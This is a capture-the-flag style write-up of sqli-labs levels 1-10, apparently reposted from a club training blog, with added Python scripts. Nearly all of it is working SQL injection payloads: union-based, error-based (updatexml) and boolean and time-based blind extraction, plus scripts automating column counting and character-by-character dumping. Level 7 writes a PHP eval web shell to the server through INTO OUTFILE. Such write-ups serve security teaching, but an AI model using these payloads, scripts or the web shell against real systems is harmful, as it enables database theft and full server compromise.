• sqli-labs levels 1-10 writeup


    I have been running some training for the juniors in our club recently and wrote up sqli-labs levels 1-10 along the way, so here it is. (The environment used was the basic sqli-labs instance on BUUCTF.)

    Sql-labs

     

    Level 1 (string type, single quote)

    • Confirm the injection: ?id=1' and 1=2%23 (compare with ?id=1' and 1=1%23; if the two responses differ, the injected condition is being evaluated. %23 is the URL-encoded #, which comments out the closing quote and the LIMIT that follow $id)

    • Determine the column count: ?id=1' order by 3%23 (raise the number until the query errors; the last value that still works is the column count)

    • Find the reflected columns: ?id=-1' union select 1,2,3%23 (id=-1 matches no real row, so the numbers shown on the page are the positions that get displayed)

    • Dump database names: ?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • Dump table names: ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • Dump column names: ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23 (add and table_schema='ctftraining' if another database also has a table called flag)

    • Dump the data: ?id=-1' union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    Level 2 (numeric type)

    • Confirm the injection: ?id=1 and 1=2%23 (no quote to close here; $id is concatenated into the query as a bare number)

    • Determine the column count: ?id=1 order by 3%23

    • Find the reflected columns: ?id=-1 union select 1,2,3%23

    • Dump database names: ?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • Dump table names: ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • Dump column names: ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • Dump the data: ?id=-1 union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    Level 3 (single quote plus parenthesis)

    • Confirm the injection: ?id=1') and 1=2%23 ($id is wrapped as ('$id'), so both the quote and the parenthesis have to be closed)

    • Determine the column count: ?id=1') order by 3%23

    • Find the reflected columns: ?id=-1') union select 1,2,3%23

    • Dump database names: ?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • Dump table names: ?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • Dump column names: ?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • Dump the data: ?id=-1') union select 1,group_concat(flag),3 from ctftraining.flag%23

     

    Level 4 (double quote plus parenthesis)

    • Confirm the injection: ?id=1") and 1=2%23 ($id is wrapped as ("$id"))

    • Determine the column count: ?id=1") order by 3%23

    • Find the reflected columns: ?id=-1") union select 1,2,3%23

    • Dump database names: ?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata%23

    • Dump table names: ?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctftraining'%23

    • Dump column names: ?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23

    • Dump the data: ?id=-1") union select 1,group_concat(flag),3 from ctftraining.flag%23
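    As an added example (Python written for this page, not code from the original writeup): the union-based procedure of levels 1 to 4 automated for any closer. Only the closer differs between the four levels; the ORDER BY probe, the UNION builder and the information_schema queries are identical, so one script generates all of them. Unlike the writeup, the column-name query also filters on table_schema, because table_name='flag' alone matches a table of that name in any database. The function names, CLOSERS table and simulated target are this example's own; against the real lab, page_ok would wrap an HTTP request and report whether the normal page came back.

```python
import re
from typing import Callable, Dict

COMMENT = "%23"      # URL-encoded '#': comments out the trailing quote and LIMIT
MAX_COLUMNS = 32
# Closers that end the server-side quoting around $id in each level.
CLOSERS = {1: "'", 2: "", 3: "')", 4: '")'}


def order_by_payload(closer: str, n: int) -> str:
    return f"?id=1{closer} order by {n}{COMMENT}"


def find_column_count(page_ok: Callable[[str], bool], closer: str) -> int:
    """Probe ORDER BY 1, 2, ...; the first n that breaks the page is columns+1.
    page_ok(payload) must return True when the normal page is rendered."""
    for n in range(1, MAX_COLUMNS + 1):
        if not page_ok(order_by_payload(closer, n)):
            if n == 1:
                raise ValueError("ORDER BY 1 already fails: wrong closer or no injection")
            return n - 1
    raise ValueError(f"more than {MAX_COLUMNS} columns")


def union_payload(closer: str, ncols: int, expr: str, slot: int,
                  from_clause: str = "") -> str:
    """UNION SELECT with expr in the reflected column slot (1-based); the other
    columns are filled with their numbers, as in the writeup. id=-1 matches
    no real row, so only the UNION row is displayed."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return f"?id=-1{closer} union select {','.join(cols)}{from_clause}{COMMENT}"


def dump_chain(closer: str, ncols: int, slot: int,
               db: str, table: str, column: str) -> Dict[str, str]:
    """The writeup's dump steps, in order, for one closer and column layout."""
    return {
        "databases": union_payload(closer, ncols, "group_concat(schema_name)", slot,
                                   " from information_schema.schemata"),
        "tables": union_payload(closer, ncols, "group_concat(table_name)", slot,
                                f" from information_schema.tables where table_schema='{db}'"),
        # Also filter on table_schema: table_name alone is ambiguous across databases.
        "columns": union_payload(closer, ncols, "group_concat(column_name)", slot,
                                 f" from information_schema.columns where table_schema='{db}' and table_name='{table}'"),
        "data": union_payload(closer, ncols, f"group_concat({column})", slot,
                              f" from {db}.{table}"),
    }


_ORDER_RE = re.compile(r"order by (\d+)")


def make_simulated_target(true_columns: int) -> Callable[[str], bool]:
    """Constructed stand-in for the lab page: ORDER BY past the real column
    count is MySQL's 'Unknown column' error, anything else renders normally."""
    def page_ok(payload: str) -> bool:
        m = _ORDER_RE.search(payload)
        return m is None or int(m.group(1)) <= true_columns
    return page_ok


if __name__ == "__main__":
    target = make_simulated_target(3)          # sqli-labs levels 1-4 have 3 columns
    for level, closer in CLOSERS.items():
        ncols = find_column_count(target, closer)
        for step, payload in dump_chain(closer, ncols, 2, "ctftraining", "flag", "flag").items():
            print(f"level {level} {step}: {payload}")
```

    The reflected slot (2 here) still has to be read off the page after the union select 1,2,3 step; everything after that is mechanical once the closer and the column count are known.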

     

    Level 5 (error-based injection, or string-type boolean blind)

     
    Error-based injection
    • Confirm the injection: ?id=1' (the unbalanced quote produces a MySQL syntax error, and this level prints the error text on the page)

    • Dump database names: ?id=1' and updatexml(1,concat('~',substr((select group_concat(schema_name) from information_schema.schemata),1,31),'~'),1)%23 (MySQL shows at most 32 characters of the invalid XPath expression, hence the ~ prefix plus a 31-character substr() window)

    • Dump table names: ?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),'~'),1)%23 (no substr() here; this only works while the list fits in the 32-character limit)

    • Dump column names: ?id=1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),1,31),'~'),1)%23

    • Dump the data, one window at a time:

    • ?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),1,31),'~'),1)%23

    • ?id=1' and updatexml(1,concat('~',substr((select group_concat(flag) from ctftraining.flag),32,64),'~'),1)%23 (starts at character 32; only the first 31 characters of this window are shown, so continue at 63 if the closing ~ has not appeared yet)
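    As an added example (Python written for this page, not code from the original writeup): pulling a value longer than 32 characters through updatexml() errors. It builds the substr() windows at 1, 32, 63, ..., parses the XPATH syntax error text, and uses the trailing ~ as the end marker: when the window is full, the 32-character limit cuts the closing ~ off, and when it is shorter the ~ survives and the value is exhausted. The function names and the simulated error page are this example's own; against the lab, fetch would perform the HTTP request and return the response body.

```python
import re
from typing import Callable, Tuple

XPATH_SHOWN = 32                     # characters MySQL echoes in the XPATH error
MARK = "~"                           # invalid XPath leading char, also our delimiter
WINDOW = XPATH_SHOWN - len(MARK)     # 31 data characters per request
COMMENT = "%23"                      # URL-encoded '#'


def error_payload(closer: str, subquery: str, start: int) -> str:
    """One window of the subquery result; start is 1-based like substr()."""
    return (f"?id=1{closer} and updatexml(1,concat('{MARK}',"
            f"substr(({subquery}),{start},{WINDOW}),'{MARK}'),1){COMMENT}")


_ERR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def parse_error(body: str) -> Tuple[str, bool]:
    """Return (chunk, complete). The trailing MARK survives only when the
    window held fewer than 31 characters, i.e. the value is exhausted."""
    m = _ERR_RE.search(body)
    if m is None:
        raise ValueError("no XPATH syntax error in response (errors not displayed?)")
    shown = m.group(1)
    if not shown.startswith(MARK):
        raise ValueError("unexpected error text: " + shown)
    data = shown[len(MARK):]
    if data.endswith(MARK):
        return data[:-len(MARK)], True
    return data, False


def dump_via_error(fetch: Callable[[str], str], closer: str, subquery: str) -> str:
    """Walk the substr() windows until the closing delimiter is seen."""
    out, start = "", 1
    while True:
        chunk, complete = parse_error(fetch(error_payload(closer, subquery, start)))
        out += chunk
        if complete:
            return out
        start += WINDOW


# --- constructed stand-in for the lab's error page, so this runs offline ----
_WIN_RE = re.compile(r"substr\(\(.*\),(\d+),(\d+)\),'" + re.escape(MARK) + r"'\)")


def make_simulated_server(secret: str) -> Callable[[str], str]:
    """Applies substr() to a known value and truncates the XPath text to
    32 characters, the way MySQL's error message does."""
    def fetch(payload: str) -> str:
        m = _WIN_RE.search(payload)
        start, length = int(m.group(1)), int(m.group(2))
        xpath = MARK + secret[start - 1:start - 1 + length] + MARK
        return f"XPATH syntax error: '{xpath[:XPATH_SHOWN]}'"
    return fetch


if __name__ == "__main__":
    # Constructed schema list; the real one depends on the lab instance.
    server = make_simulated_server("ctftraining,information_schema,mysql,performance_schema,test")
    print(dump_via_error(server, "'", "select group_concat(schema_name) from information_schema.schemata"))
```

    extractvalue() can be substituted for updatexml() with the same concat('~',...) trick and the same 32-character limit.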

    Boolean blind
    • Confirm the injection: ?id=1' and 0%23 (the row disappears when the appended condition is false)

    • Length of the concatenated database names: ?id=1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23 (adjust the number until the response flips)

    • Dump database names: ?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23 (binary-search the threshold for position 1, then move on to 2, 3, ...)

    • Dump table names: ?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23

    • Dump column names: ?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23

    • Dump the data: ?id=1' and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23

     

    Level 6 (double-quote string type, boolean blind)

    • Confirm the injection: ?id=1" and 0%23

    • Length of the concatenated database names: ?id=1" and (length((select group_concat(schema_name) from information_schema.schemata))>68)%23

    • Dump database names: ?id=1" and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23

    • Dump table names: ?id=1" and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23

    • Dump column names: ?id=1" and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23

    • Dump the data: ?id=1" and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23

     

    Level 7 (write a web shell)

    • Write the shell: ?id=0')) union select null,0x3c3f706870206576616c28245f504f53545b225968636b225d293b3f3e,null into outfile '<path>/0.php' --+ ($id is wrapped as (('$id')); the hex literal decodes to <?php eval($_POST["Yhck"]);?> and avoids putting any quotes inside the already-quoted context. This only works if the MySQL account has the FILE privilege, secure_file_priv permits writing to the target directory, and <path> is writable by the MySQL process and served by the web server.)
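    As an added example (Python written for this page, not code from the original writeup): building the INTO OUTFILE payload of level 7 from an arbitrary PHP body and path, decoding the writeup's hex literal to check what would land on disk, and reproducing the file layout MySQL produces with the default INTO OUTFILE format (columns separated by tabs, NULL written as \N, newline at the end). The function names and the /var/www/html path in the usage line are this example's own assumptions.

```python
from typing import List

# The literal used in the writeup.
PAGE_LITERAL = "0x3c3f706870206576616c28245f504f53545b225968636b225d293b3f3e"


def hex_literal(data: bytes) -> str:
    """MySQL 0x... literal: the bytes reach the file verbatim and the payload
    carries no quotes, so it survives the (('...')) wrapper of level 7."""
    return "0x" + data.hex()


def decode_hex_literal(literal: str) -> bytes:
    """Inverse of hex_literal, for checking a payload before sending it."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a MySQL hex literal")
    return bytes.fromhex(literal[2:])


def outfile_payload(closer: str, ncols: int, slot: int, php: bytes, path: str) -> str:
    """id=0 selects no real row, so only the UNION row is written to path."""
    cols: List[str] = ["null"] * ncols
    cols[slot - 1] = hex_literal(php)
    return f"?id=0{closer} union select {','.join(cols)} into outfile '{path}' --+"


def expected_file_contents(ncols: int, slot: int, php: bytes) -> bytes:
    """Default INTO OUTFILE layout: tab-separated columns, NULL as \\N, newline.
    PHP ignores the text outside <?php ... ?>, so the shell still runs."""
    parts = [b"\\N"] * ncols
    parts[slot - 1] = php
    return b"\t".join(parts) + b"\n"


if __name__ == "__main__":
    shell = decode_hex_literal(PAGE_LITERAL)
    print(shell.decode())
    # Hypothetical web root; the writeup leaves the path as a placeholder.
    print(outfile_payload("'))", 3, 2, shell, "/var/www/html/0.php"))
    print(expected_file_contents(3, 2, shell))
```

    Before sending it, check the preconditions on a MySQL shell with SHOW GRANTS FOR CURRENT_USER() (look for FILE) and SELECT @@secure_file_priv (empty means no restriction, NULL means INTO OUTFILE is disabled entirely).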

     

    Level 8 (string-type boolean blind)

    • Confirm the injection: ?id=1' and 0%23 (this level prints nothing but "You are in..." on success, so no error text is available and only the boolean signal works)

    • Length of the concatenated database names: ?id=1' and (length((select group_concat(schema_name) from information_schema.schemata))>69)%23

    • Dump database names: ?id=1' and (ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1)%23

    • Dump table names: ?id=1' and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100)%23

    • Dump column names: ?id=1' and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>105)%23

    • Dump the data: ?id=1' and (ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100)%23

     

    Level 9 (single-quote string type, time-based blind)

    • Confirm the injection: ?id=1' and sleep(5)%23 (this level returns the same page whether the condition is true, false or an error, so the response time is the only usable signal; a delay of about 5 seconds confirms it)

    • Length of the concatenated database names: ?id=1' and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23

    • Dump database names: ?id=1' and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23

    • Dump table names: ?id=1' and (if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100),sleep(5),0))%23

    • Dump column names: ?id=1' and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23

    • Dump the data: ?id=1' and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23

     

    Level 10 (double-quote string type, time-based blind)

    • Confirm the injection: ?id=1" and sleep(5)%23

    • Length of the concatenated database names: ?id=1" and (if((length((select group_concat(schema_name) from information_schema.schemata))>68),sleep(5),0))%23

    • Dump database names: ?id=1" and (if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>1),sleep(5),0))%23

    • Dump table names: ?id=1" and (if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),1,1))>100),sleep(5),0))%23

    • Dump column names: ?id=1" and (if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))>1),sleep(5),0))%23

    • Dump the data: ?id=1" and (if((ascii(substr((select group_concat(flag) from ctftraining.flag),1,1))>100),sleep(5),0))%23
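    As an added example (Python written for this page, not code from the original writeup) covering the boolean blind steps of levels 5, 6 and 8 and the time-based steps of levels 9 and 10: each character is recovered by binary search over ascii(substr(...)) instead of hand-picked thresholds like >100, so a value of n characters costs about 7n requests plus a dozen for the length. The oracle is any callable taking a payload and returning True or False; for the time-based levels make_time_oracle turns a request function into such an oracle by measuring how long it takes. The function names, the regex-based stand-in for MySQL and the simulated sleeping server are this example's own; against the lab, replace them with an HTTP request that checks for "You are in" (boolean) or just returns (time-based).

```python
import re
import time
from typing import Callable

COMMENT = "%23"            # URL-encoded '#'
ASCII_LO, ASCII_HI = 0, 127  # ascii() of an empty substr() is 0, so start at 0
MAX_LENGTH = 4096          # upper bound for the length search


def length_cond(subquery: str, threshold: int) -> str:
    return f"(length(({subquery}))>{threshold})"


def char_cond(subquery: str, pos: int, threshold: int) -> str:
    return f"(ascii(substr(({subquery}),{pos},1))>{threshold})"


def boolean_payload(closer: str, cond: str) -> str:
    """Levels 5, 6 and 8: the page differs when cond is true."""
    return f"?id=1{closer} and {cond}{COMMENT}"


def time_payload(closer: str, cond: str, delay: int = 5) -> str:
    """Levels 9 and 10: the page is identical, only the delay differs."""
    return f"?id=1{closer} and (if({cond},sleep({delay}),0)){COMMENT}"


def _bsearch(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Recover x in [lo, hi] from an oracle that answers 'x > t'."""
    if greater_than(hi):
        raise ValueError("value above the search range")
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle: Callable[[str], bool], closer: str, subquery: str,
            wrap: Callable[[str, str], str] = boolean_payload) -> str:
    """Dump the scalar result of subquery: its length first, then each character."""
    def ask(cond: str) -> bool:
        return oracle(wrap(closer, cond))
    length = _bsearch(lambda t: ask(length_cond(subquery, t)), 0, MAX_LENGTH)
    chars = []
    for pos in range(1, length + 1):
        code = _bsearch(lambda t: ask(char_cond(subquery, pos, t)), ASCII_LO, ASCII_HI)
        chars.append(chr(code))
    return "".join(chars)


def make_time_oracle(fetch: Callable[[str], None], delay: float) -> Callable[[str], bool]:
    """Turn a request function into a boolean oracle by timing it; half the
    sleep() value is the cut-off so ordinary jitter does not flip answers."""
    def oracle(payload: str) -> bool:
        start = time.perf_counter()
        fetch(payload)
        return time.perf_counter() - start >= delay / 2
    return oracle


# --- constructed stand-ins for the lab, so the script runs offline ---------
_LEN_RE = re.compile(r"length\(\(.*\)\)>(\d+)")
_CHR_RE = re.compile(r"ascii\(substr\(\(.*\),(\d+),1\)\)>(\d+)")


def evaluate_condition(secret: str, payload: str) -> bool:
    """Evaluate the two condition shapes above against a known value the way
    MySQL would (ascii() of an out-of-range substr() is 0)."""
    m = _CHR_RE.search(payload)
    if m:
        pos, t = int(m.group(1)), int(m.group(2))
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > t
    m = _LEN_RE.search(payload)
    if m:
        return len(secret) > int(m.group(1))
    raise ValueError("unrecognised payload: " + payload)


def simulated_fetch(secret: str, delay: float) -> Callable[[str], None]:
    """Server that sleeps when the injected condition is true (levels 9/10)."""
    def fetch(payload: str) -> None:
        if evaluate_condition(secret, payload):
            time.sleep(delay)
    return fetch


if __name__ == "__main__":
    schemas = "ctftraining,information_schema,mysql"   # constructed value
    print(extract(lambda p: evaluate_condition(schemas, p), "'",
                  "select group_concat(schema_name) from information_schema.schemata"))
    slow = make_time_oracle(simulated_fetch("flag{ok}", 0.05), 0.05)
    print(extract(slow, '"', "select group_concat(flag) from ctftraining.flag",
                  wrap=lambda c, cond: time_payload(c, cond, 5)))
```

    Against a real target the time-based oracle should also retry a positive answer once before accepting it, since a single slow response from network latency otherwise corrupts one character and every search after it.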



  • Original article: https://www.cnblogs.com/Yhck/p/13937402.html
Copyright © 2020-2023  润新知